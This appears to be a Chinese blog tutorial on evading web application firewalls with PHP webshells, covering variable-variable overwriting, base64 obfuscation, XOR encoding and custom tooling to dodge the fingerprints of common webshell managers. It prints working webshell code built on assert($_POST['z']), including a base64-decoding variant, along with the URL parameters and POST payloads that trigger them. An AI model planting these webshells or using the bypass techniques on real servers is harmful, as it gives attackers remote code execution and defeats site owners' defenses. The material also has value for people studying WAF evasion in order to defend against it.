(48.3)【WAF绕过-代码】变量覆盖、加密混淆、异或生成、造轮子

目录

一、变量覆盖

1.1、原理:

1.2、原型:

1.3、变量覆盖:

1.4、URL传参

二、加密混淆

2.1、原理:

2.2、shell文件

2.3、加密

2.4、URL传参

2.5、加密混淆工具

三、异或生成

3.1、原理:

3.2、网址:

四、造轮子

4.1、原因:

4.2、方法一:

4.3、方法二:


一、变量覆盖

1.1、原理:

把敏感字符传递的参数中,waf能够确定你的代码,但是确定不了你传递的参数值

safedog有变量追踪

简单拆分的话,扫描会直接报马的


1.2、原型:

<?php assert($_POST['z'])?>


1.3、变量覆盖:

<?php
$a = $_GET['x'];
$$a = $_GET['y'];
$b($_POST['z']);

//?x=b&y=assert
//$a = b
//$$a ->$b 变量引用
//$b= assert
//$b($_POST['z']);--->assert($_POST['z'])

?>

1.4、URL传参

URL/1.php?x=b&y=assert

-----------------

(post提交)

z=phpinfo();



二、加密混淆

2.1、原理:

基于关键字的匹配过滤规则

上传一个附带对应的解密方法,然后上传经过对应加密的执行语句


2.2、shell文件

shell.php

<?php
$a = $_GET['x'];
$$a = $_GET['y'];
$b(base64_decode($_POST['z']));
?>

2.3、加密

对要执行的语句加密


2.4、URL传参

URL/1.php?x=b&y=assert

(post提交)

z=cGhwaW5mbygpOw==

2.5、加密混淆工具

【WAF绕过-加密混淆】php代码加密混淆icon-default.png?t=M4ADhttps://blog.csdn.net/qq_53079406/article/details/124874012?spm=1001.2014.3001.5501



三、异或生成

3.1、原理:

定义:两个值相同时,返回false,否则返回true

XOR有一个特点:如果对一个值连续做两次 XOR,会返回这个值本身。


最适合用于简易加解密运算

原理是:数A和数B进行异或运算生成数C,如果将C和B进行异或运算则C又会还原为A

3.2、网址:

异或运算加密/解密 - 一个工具箱 - 好用的在线工具都在这里! (atoolbox.net)icon-default.png?t=M4ADhttp://www.atoolbox.net/Tool.php?Id=857



四、造轮子

4.1、原因:

菜刀、蚁剑、冰蝎的指纹在WAF都有,使用会被识别拦截


4.2、方法一:

修改工具的特征信息

4.3、方法二:

自己写数据包,就不会有指纹特征,就能实现相应的功能

  • 4
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值